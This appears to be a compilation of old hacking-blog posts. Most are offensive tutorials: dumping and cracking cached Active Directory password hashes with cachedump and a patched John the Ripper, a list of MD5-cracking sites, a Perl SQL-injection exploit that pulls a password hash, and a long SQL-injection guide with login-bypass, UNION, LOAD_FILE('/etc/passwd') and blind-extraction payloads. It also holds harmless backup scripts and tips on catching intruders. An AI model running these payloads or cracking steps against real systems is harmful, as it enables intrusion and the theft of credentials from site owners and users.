Hello Everyone ,

if you use active directory you may notice windows xp sometimes allows you to login to computer even if your network is unplugged. this is because microsoft save your active directory password hash into your system registry using some algorithm named as MSCASH . there are many tools availble on internet to dump or to get these password hashes from registry.Password hash is saved in the Windows registry and by default saved 10 hashes.you can read more about mscash here .

Tools :

cachedump:

i personally first used cachedump a great dos based tool with which u can get saved active directory password hash.

you can download cachedump here .

Cain & Abel :

the second great tool availble to dump AD {active directory} saved hashes is Cain & Abel you can download Cain & Abel here

Recover Password

.

Second Part Crack Password :

now as you have your lost password hash you can use john the ripper with a small patch to crack your lost password mscash hash.

first you need a linux (ubuntu will be ok ) machine to use john. offcourse u can use windows but i will preffer linux as i dont know how we can patch john for mscash support ( i think you can do it using cygwin ). ok lets download and install john and patch it.

Rule # 1 : Don’t install john using apt-get install john ( if u do have thats ok but we will not be using that ) .

Step # 1 : login to your linux box.

Step # 2: download john 1.72 using :

wget -c ftp://ftp.openwall.com/pub/projects/john/1.7.2/john-1.7.2.tar.gz

Step # 3: extract john using :

tar xzf john-1.7.2.tar.gz

Step # 4: download patch for mscash using :

wget http://coast.cs.purdue.edu/pub/tools/unix/pwdutils/john/contrib/john-1.7.2-mscash-alainesp-4.1.diff.gz

Step # 5: Rename john to :

mv john-1.7.2 john-1.7.2.orig

Step # 6: patch john using :

gunzip -c john-1.7.2-mscash-alainesp-4.1.diff.gz | patch -p0

Step # 7: make John the ripper

cd john-1.7.2.orig/src && make linux-x86-mmx (depend on your system architect)

Step # 8: start cracking password using :

../run/john -i:all -format:mscash [filepath]

I hope this would help you. Please post comments and feedback.

Hello ,

below is some links to crack md5 password hashes online , i will keep this post updated with all online links for cracking md5.

http://gdataonline.com
http://md5.rednoize.com
http://ice.breaker.free.fr
http://www.milw0rm.com/md5/
http://shm.hard-core.pl/md5/
http://www.hashchecker.com
http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
http://md5.benramsey.com
http://md5.altervista.org
http://shm.hard-core.pl
http://plain-text.info
http://www.passcracking.ru/
http://www.securitystats.com/tools/hashcrack.php
http://www.xmd5.org/index_en.htm

Hello ,

i have created a small bash script to backup complete mysql server and then restore it. you can download the script and configure it as per your need.

Download :

      mysql-backup.sh         29-Apr-2009 08:31  488
      mysql-restore.sh        29-Apr-2009 08:31  1.0K

you need to change permissions for this script to be executed change permissions using :

chmod +x mysql-backup.sh

chmod +x mysql-restore.sh

This script requres mysql server, mysql clinet  and mysqldump to take backup of databases and then to restore it ,

Please post you feedback if you got any problem using this script please comment below .

Hello guys ,

i hope most of you have subversion installed and running , and you might have got chance        to  take backup of you subversion repositories.

i have created couple of scripts that can take mass backup of all repositores in your   subversion repositories parent directory also the other script restore all repositories , all you  need is to change path for backup place and your repositores folder and then enjoy while this script take backup of each repository automatically it saves a lot of time.

Download Both scripts :

Backup.sh

Restore.sh

Below is step by step procedure on how to use this script :

Please if you modify it don’t remove my name or links

Step 1 ) upload backup.sh to you subversion server ,

Step 2) configure backup.sh according to your server requirements

Step 3) modify permissions for script using :

chmod +x backup.sh

Step 4) start the backup using : (* you should have permissions to directories on server where your repo exists)

sh backup.sh

Step 5) check backup logs using :

tail -f  {logfilepathhere}

Step 6)  Now Backup completed so you can compress backups files using :

tar cfz subversion_backup.tar.gz /home/svn/backups/full

Step 7) Move backup to new server where you want to take your svn or to some safe place

Step Start the restore process & upload restore.sh

Step 9) config paths in restore.sh as in step 2

Step 10) change permission of it using :

chmod +x restore.sh

Step 11) Execute the restore script :

sh restore.sh

Step 12) Every thing is restored you may go to bed for sleep now

Enjoy the script and do post your feedback , if anyone need subversion installation or backup or any other professional service you may contact me adeel.ahmad+hackinggurus at networkncc.com .

How To Catch A Hacker

I just wrote this guide to give you some tips of which you may not have heard yet. Hopefully, it won’t come to a hacker getting in, but if it does…

Tip 1: Hackers cover their tracks. Experienced hackers cover them more thorougly, but amateur hackers sometimes leave things behind. Don’t expect them to leave any really big evidence behind; expect more of little things here and there you might find surprising. For example, if you’re writing a term paper and a black hat hacker accidently saved it when he took a paragraph out- that’s suspicious. Where did that paragraph go? Well, for one thing, now you know he was in that area. Check the folders surrounding the file- you might find something.

Tip 2: Decipher between the type of hackers that are attacking you. Experienced hackers will have a more in depth look around when they penetrate your system. They won’t touch much because they know that that won’t add too much to their knowledge. But if you know a hacker’s been in, and some files are messed with, and you have a log of someone guessing passwords to a file or something of that sort, its probably some newbie who’s just starting out. These are the easiest hackers to catch. They usually get so caught up in thoughts like “I’m in!” that they forget the basics, such as work behind a proxy.

My friend was setting up a webserver once. His first time too, and he wasn’t to anxious to set up some good software to protect against hackers and viruses. He didn’t put up one IDS, and before you know it, the obvious happened. But this time, a newbie had struck. The nice log files showed, bluntly across the screen, multiple instances of a foreign IP address that stood out. Some stupid newbie had tried to login as “uucp” on my friend’s XP computer, with a password of “uucp.” Well, that’s great, but he also had tried the same user/pass combination three times, enough to get himself logged nicely. Even a semi-brainless user with some form of neurological system knows that uucp isn’t a default XP account. Again, excitement toiled this hacker’s brain, and maybe if he hadn’t done that, along with a few other stupid things, he wouldn’t have gotten caught. What other things did he do? Well, lets see. He openned 35 instances of MS-DOS. He tried to clean the printer’s heads, and he edited a .gif in notepad. Then he uninstalled a few programs and installed some html editor, and replaced four files with the words “14P.”

He might as well have posted his phone number. In a few days, we had tracked him down to a
suburban town in Ohio. We let him go, not pressing any charges, because he had done nothing really damaging and had provided me with an example of a moron for this guide.

Tip 3: Don’t go crazy if you lose data. Chances are, if it was that important, you would have backed it up anyway. Most hackers nowadays wish they were back in 1989 when they could use a Black Box and having a Rainbow Book actually meant something. Most hackers aren’t blackhat, they are whitehat, and some even greyhat. But in the end, most hackers that are in systems aren’t satisfied by looking around. From past experiences, I have concluded that many hackers like to remember where’ve they been. So, what do they do? They either press delete here and there, or copy some files onto their systems. Stupid hackers (yes, there are plenty of stupid hackers) send files to e-mail addresses. Some free email companies will give you the IP of a certain e-mail address’s user if you can prove that user has been notoriously hacking you. But most of the time, by the time you get the e-mail addy it’s been unused for weeks if not months or years, and services like hotmail have already deleted it.

Tip 4: Save information! Any information that you get from a log file (proxy server IP, things like “14P”, e-mail addresses that things were sent to, etc.) should be saved to a floppy disk (they’re not floppy anymore, I wish I could get out of the habit of calling them that) incase there’s a next time. If you get another attack, from the same proxy, or with similar e-mail addresses (e.g: one says Blackjack 123@something.whatever and the other says Black_jack_45@something.znn.com) you can make an assumption that these hackers are the same people. In that case, it would probably be worth the effort to resolve the IP using the proxy and do a traceroute. Pressing charges is recommended if this is a repeat offender.

Tip 5: Don’t be stupid. If you’ve been hacked, take security to the next level. Hackers do talk about people they’ve hacked and they do post IPs and e-mail addresses. Proof? Take a look at Defcon Conventions. I’ve never gone to one, but I’ve seen the photos. The “Wall of Shame”-type of boards I’ve seen have IPs and e-mail addresses written all over them in fat red, dry-erase ink. Don’t be the one to go searching the Defcon website and find your e-mail address posted on the Wall of Shame board!

Tip 6: Don’t rely on luck. Chances are, sometime or another, you’re going to be targeted for an attack. Here you can rely on luck. Maybe they’ll forget? Maybe they don’t know how to do it? If you think this way, a surprise is going to hit your face very hard. Another way you could stupidly rely on luck is by saying this: It’s probably just a whitehat. On the contrary, my friend, it’s probably just a blackhat. A blackhat with knowledge stored in his head, ready to be used as an ax. It’s your data. You take the chance.

[1] Introduction
[2] Little panning of Perl language used into an internet context
[3] Perl SQL Injection by examples
[4] Gr33tz to …

—+— StArT

[1] Introduction

Perl can be considered a very powerfull programming language in we think to the internet context. Infact we can make a lot
of operation across the internet just writing a litlle bit of code. So i decided to write a similar guide to make an
easiest life to everyone who decide to start writing a perl exploit.
There are few requisites u need to proceed:
- U must know the basics operation of perl (print, chomp, while, die, if, etc etc…);
- U must know what kind of SQL code u need to inject to obtain a specific thing (stealing pwd, add new admin, etc etc…).

Now, we are ready to start…

[2] Little panning of Perl language used into an internet context

Using a Perl code into an internet context means that u should be able to make a sort of dialog between your script and the
server side (or other..). To make this u need to use some “Perl modules”.
Those modules must be put on the head of the script. In this tut we are going to use only the “IO::Socket” module, but
there are thousand and if u are curious just search on cpan to retrieve info on every module.

[-] Using the IO::Socket module
Using this module is quite simple. To make the Perl Interpreter able to use this module u must write on the starting
of the script “use IO::Socket”. With this module u’ll be able to connect to every server defined previously, using
a chomp, look at the example.

Example:
print “Insert the host to connect: “;
chomp ($host=<STDIN>);

Now suppose that the host inserted is www.host.com. We must declare to the interpreter that we want to connect to this
host. To do this, we must create a new sock that will be used by the interpreter to connect.
To create this we are going to write something like this:

$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";

In this piece of code we have declared that the interpreter must use the "IO::Socket" module, creating a new
connection, through the TCP protocol, using the port 80 and direct to the host specified in the chomp
($host=www.fbi.gov).
If connection is not possible an error message will appear ("Connecting ... Can't connect to host").
Resume:
- Proto=>TCP -------> The protocol to use (TCP/UDP)
- PeerAddr=> -------> The server/host to connect
- PeerPort=> -------> Port to use for the connection

Ok, now let's go to the next step, which is the real hearth of this tut.

[3] Perl SQL Injection

Assuming that we know what kind of SQL statement must inject, now we are going to see how to do this.

The SQL code must be treaty like a normal variable (like “$injection”).

Example:
$injection=index.php/forum?=[SQL_CODE]

This string means that we are going to inject the query into “index.php/forum” path, following the correct syntax that
will bring us to cause a SQL Injection “?=”.

Now we must create a piece of code that will go to inject this query into the host vuln.

print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;

This piece of code is the most important one into the building of an exploit.
It can be considered the “validation” of the connection.
In this case the “print” command doesn’t show anything on screen, but it creates a dialogue and sends commands to the host.

In the first line the script will send a “GET” to the selected page defined into “$injection”.
In the third line it tells to the host “who/what” is making the request of “GET”. In this case this is Hacker, but it
can be “Mozilla/5.0 Firefox/1.0.4″ or other.
In the fourth line it defines the host to connect to, “$host”.

With the execution of this script we have made our injection.

Resume of the exploit:

use IO::Socket

print “Insert the host to connect: “;
chomp ($host=<STDIN>);

$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";

$injection=index.php/forum?=[SQL_CODE]

print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;
close ($sock); #this line terminates the connection

A little trick:

Assuming that, with the execution of SQL Inj, u want to retrieve a MD5 Hash PWD, u must be able to recognize it.
Additionally, u want that your script will show the PWD on your screen.
Well, to make this, the next piece of code, could be one of the possible solutions.

while($answer = <$sock>) {
if ($answer =~ /([0-9a-f]{32})/) {
print “]+[ Found! The hash is: $1n”;
exit(); }

This string means that if the answer of the host will show a “word” made by 32 characters (”0″ to “9″ and “a” to “f”),
this word must be considered the MD5 Hash PWD and it must be showed on screen.

Conclusions:
The method showed in this tut is only one of the 10000 existing, but, for me, this is the most complete one.
U could use also the module “LWP::Simple” in the place of “IO::Socket”, but u should change something into the code.
This method can be used also, not only for SQL Injection, but, for example, remote file upload or other.

UNIX Commands

UNIX Commands are usefull, because without them you will not be able to explore shells etc. I listed all commands that may be helpfull for newbie exploiters.

pwd – shows actual path where you are

ifconfig [interface] – show interface config e.g. ethernet , wlan etc
ls – lists files in directorcy

ls -l – lists files in directory with details like date, size, attributes

ls -a – lists files in directory and shows hidden files

For example you are actually in directory /www/docs/pub/ccbill/files so putting ls command will let you to see all files in this directory. If you want move to /www/docs/pub/ directory then you just need to put ls /www/docs/pub/ it will move you there and show all files there also.

cat [file name] – shows content of file

For example you want to check what is inside /www/docs/pub/ccbill/.htpasswd file so you simply put cat /www/docs/pub/ccbill/.htpasswd command and all info inside will be displayed

locate [file name] – will let you to locate file directly, when the files are found it will display paths

For example you want to find htpasswd file on server so simply put locate htpasswd and it will find all paths with this file for you.

rm [file name] – removes a file, you can also add -i to make a confirmation for deleting

cp [file name 1] [file name 2] – copies a file

mv [file name 1] [file name] – moves a file

mkdir [dir name] – makes a new directory

i will post more soon and will explain commands one by one in my next posts so keep looking for them .

-[ SUMMARY ]———————————————————————
Introduction
Injecting SQL
Exploiting a Login Form
Exploiting Different SQL Statement Type
Basic Victim Fingerprinting
Standard Blind SQL Injection
Double Query
Filters Evasion
SQL Injection Prevention
Conclusion
———————————————————————————

—[  Introduction ]

Hi everybody! I’m here again to write a little, but I hope interesting, paper concerning
Web Application Security. The aim of these lines are to help you to understand security
flaws regarding SQL Injection.

I know that maybe lots of things here explained are a little bit old; but lots of people
asked to me by email how to find/to prevent SQL Injection flaws in their codes.

Yes, we could say that this is the second part of my first paper regarding PHP flaws
(PHP Underground Security) wrote times ago; where I explained in a very basic form the SQL Injection
(The reason? The focus was on an other principal theme).

How I wrote this paper? In my free time, a couple of lines to help people to find, prevent
this kind of attacks. I hope you enjoy it. For any question or whatever please
contact me here: omni_0 [at] yahoo [DOT] com .
——————————————————————————-[/]

—[ Injecting SQL ]

As you know almost every dynamic web applications use a database (here we talk
about web application based on “LAMP architecture”) to store any kind of data needed
by the application such as images path, texts, user accounts, personal information,
goods in stock, etc.

The web application access to those information by using the SQL (Structured Query
Language). This kind of applications construct one or more SQL Statement to query
the DataBase (and for example to retrieve data); but this query sometimes incorporporate
user-supplied data. (take in mind this)

What about SQL? SQL is a DML (Data Manipulation Language) that is used
to insert, retrive and modify records present in the DataBase.

As I said before web application uses user-supplied data to query the DB but if the
supplied data is not properly sanitized before being used this can be unsafe and
an attacker can INJECT HIS OWN SQL code.
These flaws can be very destructive because an attacker can:

- Inject his data
- Retrive information about users, CC, DBMS.. (make a kind of information gathering)
- and so on..

The fundamentals of SQL Injection are similar to lots of DBMS but, as you know
there are some differences, in this paper I will cover “Exploting SQL Injection
in MySQL DBMS” as said upon (this means that if you want to test techniques here
explained on others DBMS you need to try at your own).
——————————————————————————-[/]

—[ Exploiting a Login Form ]

Sometimes happends that coders doesn’t properly sanitize 2 important variables
such as user-name and password in the login form and this involve a critical
vulnerability that will allow to the attacker the access to a reserved area.

Let’s make an example query here below:

SELECT * FROM users WHERE username = ‘admin’ and password = ’secret’

With this query the admin supply the username ‘admin’ and the password ’secret’
if those are true, the admin will login into the application.
Let us suppose that the script is vulnerabile to sql injection; what happends
if we know the admin username (in this case ‘admin’)? We don’t know the password, but
can we make an SQL Injection attack? Yes, easily and then we can gain the access to the application.
In this way:

SELECT * FROM users WHERE username = ‘admin’ /*’ and password = ‘foobar’

So, we supplied this information:

- As username = admin’ /*
- As password = foobar (what we want..)

Yes, the query will be true because admin is the right username but then with the
‘ /* ‘ symbol we commented the left SQL Statement.

Here below a funny (but true) example:

$sql = “SELECT permissions, username FROM $prefix”.”auth WHERE
username = ‘” . $_POST['username'] . “‘ AND password = MD5(’”.$_POST['wordpass'].”‘);”;

$query = mysql_query($sql, $conn);

The variables passed with the POST method are not properly sanitized before being used
and an attacker can inject sql code to gain access to the application.
This is a simple attack but it has a very critical impact.
——————————————————————————-[/]

—[  Exploiting Different SQL Statement Type ]

SQL Language uses different type of statements that could help the programmer to
make different queries to the DataBase; for example a SELECTion of record,
UPDATE, INSERTing new rows and so on. If the source is bugged an attacker can
“hack the query” in multiple ways; here below some examples.

SELECT Statement
——————

SELECT Statement is used to retrieve information from the database; and is
frequentely used “in every” application that returns information in response
to a user query. For example SELECT is used for login forms, browsing catalog, viewing
users infos, user profiles, in search engines, etc. The “point of failure” is
often the WHERE clause where exactly the users put their supplied arguments.

But sometimes happends that the “point of failure” is in the FROM clause; this
happends very rarely.

INSERT Statement
——————

INSERT statement is used to add new row in the table; and sometimes the application
doesn’t properly sanitize the data, so a query like the beneath could be vulnerable:

INSERT INTO usr (user, pwd, privilege) VALUES (’new’, ‘pwd’, 10)

What happends if the pwd or username are not safe? We can absolutely “hack the
query” and perform a new interesting query as shown below:

INSERT INTO usr (user, pwd, privilege) VALUES (’hacker’, ‘test’, 1)/*’, 3)

In this example the pwd field is unsafe and is used to create a new user with
the admin privilege (privilege = 1):

$SQL= “INSERT INTO usr (user, pwd, id) VALUES (’new’, ‘”.$_GET['p'].”‘, 3)”;

$result = mysql_query($SQL);

UPDATE Statement
——————

UPDATE statement is used (as the word says) to UPDATE one or more records.
This type of statement is used when users (logged into the application) need
to change their own profile information; such as password, the billing address,
etc. An example of how the UPDATE statement works is shown below:

UPDATE usr SET pwd=’newpwd’ WHERE user = ‘billyJoe’ and password = ‘Billy’

The field pwd in the update_profile.php form is absolutely “a user-supply data”; so,
try to imagine what happends if the code is like the (vulnerable) code pasted below:

$SQL = “UPDATE usr SET pwd=’”.$_GET['np'].”‘ WHERE user = ‘billyJoe’ and pwd = ‘Billy’”;
$result = mysql_query($SQL);

In this query the password needs to be correct (so, the user needs to know his own password )
and the password will be supplied with the GET method; but leave out this detail (it’s not so important
for our code injection) and concentrate to the new password field (supplied by $_GET['np'], that
is not sanitized); what happeds if we will inject our code here? Let see below:

UPDATE usr SET pwd=’owned’ WHERE user=’admin’/*’ WHERE user = ‘ad’ and pwd = ’se’

here we just changed the admin password to ‘ owned ‘ sounds interesting right?

UNION SELECT Statement
————————-

The “UNION SELECT Statement” is used in SQL to combine the results of 2
or more different SELECT query; obviously in one result.
This kind of statement is very interesting because when you have a SELECT query
often you can add your own UNION SELECT statement to combine the queries (sure,
only if you have a “bugged sql statement”) and view the 2 (or more) results in only
one result set. To better understand what I mean I think is better to see an interesting
example and put our hands on it.

Here is our vulnerable code:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

$SQL = “select * from news where id=”.$_GET['id'];

$result = mysql_query($SQL);

if (!$result) {
die(’Invalid query: ‘ . mysql_error());
}

// Our query is TRUE
if ($result) {
echo ‘<br><br>WELCOME TO www.victim.net NEWS<br>’;
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {

echo ‘<br>Title:’.$row[1].’<br>’;
echo ‘<br>News:<br>’.$row[2];
}

}

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

As we can see the $SQL variable is vulnerable and an attacker can inject his own
code into it and then gain interesting information. What happends if via browser we
call this URL: http://www.victim.net/CMS/view.php?id=1 ?

Nothing interesting, just our news with the ID equal to 1, here below:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

How to make this interesting? We can use our UNION SELECT operator, and the
resultant query will be:

select * from news where id=1 UNION SELECT * FROM usr WHERE id = 1

What is gonna happend? Look below:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?
Title:secret

News:
1

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

“Title: secret” is the admin password (ID = 1 is the admin in most cases) and the 1 in the “News:”
is the admin ID. So, why our output is so strange? This is not strange our tables has been made
in different ways. Just to make things clear look the tables below:

mysql> select * from usr;
———————–
| user | pwd | id |
———————–
| admin | secret | 1 |
———————–
| ad | aaaaa | 2 |
———————–
| new | test | 5 |
———————–

mysql> select * from news;
—————————————————
| id | title | texts |
—————————————————
| 1 | testing news | what about SQL Injection? |
—————————————————
| 2 | testing news 2 | could be bypassed easily? |
—————————————————

Our UNION SELECT query will be:

mysql> select * from news where id = 1 union select * from usr where id = 1;
—————————————————
| id | title | texts |
—————————————————
| 1 | testing news | what about SQL Injection? |
—————————————————
| admin | secret | 1 |
—————————————————

Is now clear? We have found the admin password. It’s great!

Ok, lets go deeper; what happends if we have 2 tables with a different number of
columns? Unfortunaltely UNION SELECT doesn’t work as show upon. I want to make
2 different examples to help you.

LESS FIELDS
————

mysql> select * from Anews;
————————————————
| title | texts |
————————————————
| testing news 2 | could be bypassed easily? |
————————————————

mysql> select * from Anews union select * from usr;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

Yes, this is what happends if the UNION SELECT is used and the tables have a different
number of columns. So, what we can do to bypass this?

mysql> select * from Anews union select id, CONCAT_WS(’ – ‘, user, pwd) from usr;
——————————————–
| title | texts |
——————————————–
| testing news 2 | could be bypassed easily? |
——————————————–
| 1 | admin – secret |
——————————————–
| 2 | ad – aaaaa |
——————————————–
| 5 | new – test |
——————————————–

We bypassed “the problem” just using a MySQL function CONCAT_WS (CONCAT can be used too).
Take in mind that different DBMS works in different way. I’m explaining in a general manner; therefore
sometimes you have to find other ways.

MORE FIELDS
————-

mysql> select * from fnews;
——————————————————–
| id | pri | title | texts |
——————————————————–
| 1 | 0 | testing news 2 | could be bypassed easily? |
——————————————————–

What we can do now? Easy, just add a NULL field!!

mysql> select * from fnews union select NULL, id, user, pwd from usr;
———————————————————
| id | pri | title | texts |
———————————————————
| 1 | 0 | testing news 2 | could be bypassed easily? |
———————————————————
| NULL | 1 | admin | secre |
———————————————————
| NULL | 2 | ad | aaaaa |
———————————————————
| NULL | 5 | new | test |
———————————————————

——————————————————————————-[/]

—[  Basic Victim Fingerprinting ]

In this part of the paper I’ll explain some easy, but interesting, ways used while trying to do
information gathering before the Vulnerability Assessment and Penetration Test steps.

This is our scenario: we found a bugged Web Application on the host and we can inject our
SQL code.

So, what we need to know? Could be interesting to know the mysql server version;
maybe it’s a bugged version and we can exploit it.

How to do that? (I will not use bugged code; I’ll just make some examples. Use your
mind to understand how to use “these tips”)

mysql> select * from fnews WHERE id = 1 union select version(), NULL, NULL, NULL from usr;
—————————————————————————–
| id | pri | title | texts |
—————————————————————————–
| 1 | 0 | testing news 2 | could be bypassed easily? |
—————————————————————————–
| 5.0.22-Debian | NULL | NULL | NULL |
—————————————————————————–

Here our mysql version. Also the OS has been putted on the screen (take in mind that
sometimes these information are modified).

Could be interesting to know the server time:

mysql> select * from fnews WHERE id = 1 union select NOW(), NULL, NULL, NULL from usr;
—————————————————————————
| id | pri | title | texts |
—————————————————————————
| 1 | 0 | testing news 2 | could be bypassed easily? |
—————————————————————————
| 2009-02-27 00:03:56 | NULL | NULL | NULL |
—————————————————————————

Yes, sometimes is useful to know what is the user used to connect to the database.

mysql> select * from fnews WHERE id = 1 union select USER(), NULL, NULL, NULL from usr;

——————————————————————–
| id | pri | title | texts |
——————————————————————–
| 1 | 0 | testing news 2 | could be bypassed easily? |
——————————————————————–
| omni@localhost | NULL | NULL | NULL |
——————————————————————–

An interesting function implemented in mysql server is LOAD_FILE that, as the
word say, is able to load a file. What we can do with this? gain information and
read files. Here below the query used as example:

select * from news where id=1 union select NULL,NULL,LOAD_FILE(’/etc/passwd’) from usr;

This is what my FireFox shows to me:

http://www.victim.net/CMS/view.php?id=1%20union%20select%20NULL,NULL,LOAD_FILE(’/etc/password’)%20from%20usr;

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?
Title:

News:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
[output cutted]
[...]

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

Sounds interesting right, don’t you?

Could be interesting to get some sensitive information such as mysql users and passwords
right? By injecting our code as shown below we can get such that information.

SELECT * FROM news WHERE id=’1′ UNION SELECT Host, User, Password FROM mysql.user/*’
——————————————————————————-[/]

—[  Standard Blind SQL Injection ]

SQL Injection and Blind SQL Injection are attacks that are able to exploit a software
vulnerability by injecting sql codes; but the main difference between these attacks
is the method of determination of the vulnerability.

Yes, because in the Blind SQL Injection attacks, attacker will look the results
of his/her requests (with different parameter values) and if these results will return
the same information he/she could obtain some interesting data. (I know, it seems
a bit strange; but between few lines you will understand better).

But why Standard Blind SQL Injection? What does it mean? In this part of the paper
I’ll explain the basic way to obtain information with Blind SQL Injection without bear
in mind that this type of attacks could be optimized. I don’t wanna talk about the
methods to optimize a Blind SQL Injection attack.(Wisec found interesting things about that -
“Optimizing the number of requests in blind SQL injection”).

Ok, let’s make a step forward and begin talking about Detection of Blind SQL Injection.
To test this vulnerability we have to find a condition that is always true; for example
1=1 is always TRUE right? Yes, but when we have to inject our code in the WHERE
condition we don’t know if our new injected query will be true or false; therefore
we have to make some tests. When the query is true? The query is true when the record
returned contain the correct information. Maybe is a little bit strange this explanation but
to make things clear I wanna let you see an example. Suppose that we requested this
URL:

http://www.victim.net/CMS/view.php?id=1

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

As you can see we have just viewed our first news (id=1). What happends if we request
this other URL: http://www.victim.net/CMS/view.php?id=1 AND 1=1 ?
In our browser we just see the same page because the query is obviously true.
Here below the injected query:

SELECT * FROM news WHERE id=1 AND 1=1 LIMIT 1

Now, we (I hope) have understood what is a Blind SQL Injection; and to understand
better how we can use this, I want to make a simple example/scenario. I’m thinking that
the web application is connected to MySQL using the user omni; how to know this by using
Blind SQL Injection? Just requesting this URL:

http://www.victim.net/CMS/view.php?id=1 AND USER()=omni@localhost’

and watch the reply sent on our browser. If in our FireFox (or whatever you want)
we will see the news with ID=1 we know that omni is the user used to connect to
the mysql deamon (because the query is true; and we found the true value to pass
to the query).
Let’s go deeper. What we can do with Blind SQL? Could be interesting to retrieve
the admin password. How to do that? First of all to understand better the
steps I’m going to explain we need to know some basic information.

Function used in MySQL:

- ASCII(str)
Returns the numeric value of the leftmost character of the string str.
Returns 0 if str is the empty string. Returns NULL if str is NULL. ASCII()
works for 8-bit characters.

mysql> select ascii(’a');
———–
| ascii(’A') |
———–
| 97 |
———–

mysql> select ascii(’b');
———–
| ascii(’b') |
———–
| 98 |
———–

- ORD(str)

If the leftmost character of the string str is a multi-byte character, returns
the code for that character, calculated from the numeric values of its constituent
bytes using this formula:

(1st byte code)
+ (2nd byte code x 256)
+ (3rd byte code x 2562) …

If the leftmost character is not a multi-byte character, ORD() returns the same value as
the ASCII() function.

- SUBSTRING(str,pos), SUBSTRING(str FROM pos),
SUBSTRING(str,pos,len), SUBSTRING(str FROM pos FOR len)

The forms without a len argument return a substring from string str starting at position pos.
The forms with a len argument return a substring len characters long from string str, starting
at position pos.
The forms that use FROM are standard SQL syntax. It is also possible to use a negative value
for pos. In this case, the beginning of the substring is pos characters from the end of the
string, rather than the beginning.
A negative value may be used for pos in any of the forms of this function.

- SUBSTR(str,pos), SUBSTR(str FROM pos),
SUBSTR(str,pos,len), SUBSTR(str FROM pos FOR len)

SUBSTR() is a synonym for SUBSTRING().

mysql> select substring(’Blind SQL’, 1, 1);
—————————-
| substring(’Blind SQL’, 1, 1) |
—————————-
| B |
—————————-

mysql> select substring(’Blind SQL’, 2, 1);
—————————-
| substring(’Blind SQL’, 2, 1) |
—————————-
| l |
—————————-

- LOWER(str)

Returns the string str with all characters changed to lowercase according to
the current character set mapping. The default is latin1 (cp1252 West European).

mysql> SELECT LOWER(’SQL’);
—————-
| LOWER(’SQL’) |
—————-
| sql |
—————-

- UPPER(str)

Returns the string str with all characters changed to uppercase according to
the current character set mapping. The default is latin1 (cp1252 West European).

mysql> SELECT UPPER(’sql’);
————–
| UPPER(’sql’) |
————–
| SQL |
————–

Now we have understood the principals MySQL functions that could be used while
trying to do a Blind SQL Injection attack. (consult MySQL reference manuals for others)

What we need again? Suppose that we know for a moment the admin password: “secret”.

mysql> select ascii(’s’);
———–
| ascii(’s’) |
———–
| 115|
———–

mysql> select ascii(’e');
———–
| ascii(’e') |
———–
| 101|
———–

mysql> select ascii(’c');
———–
| ascii(’c') |
———–
| 99 |
———–

mysql> select ascii(’r');
———–
| ascii(’r') |
———–
| 114|
———–

mysql> select ascii(’t');
———–
| ascii(’t') |
———–
| 116|
———–

It’s time to watch the source code:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

[ ... ]

$SQL = “select * from news where id=”.$_GET['id'].” LIMIT 1″;

$result = mysql_query($SQL);

if (!$result) {
die(’Invalid query: ‘ . mysql_error());
}

[ ... ]

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

Now, try to “exploit the bug” by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

The query is TRUE (we know that the first letter of the password is ’s’) and therefore, the query will be:

SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115 LIMIT 1

What is the number 115? Read upon is the ascii value of the ’s’. We retrieved the first character
of the password (by using some MySQL functions).

.:. (SELECT pwd FROM usr WHERE id=1) => SELECT the password of the user with ID=1 (admin)
.:. (SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1) => Get the first letter of the password (in this case ’s’)
.:. ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) => Get the ASCII code of the first letter (115 in this case)

And how to retrieve the second letter of the password? Just carry out this query:

SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101 LIMIT 1

by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101
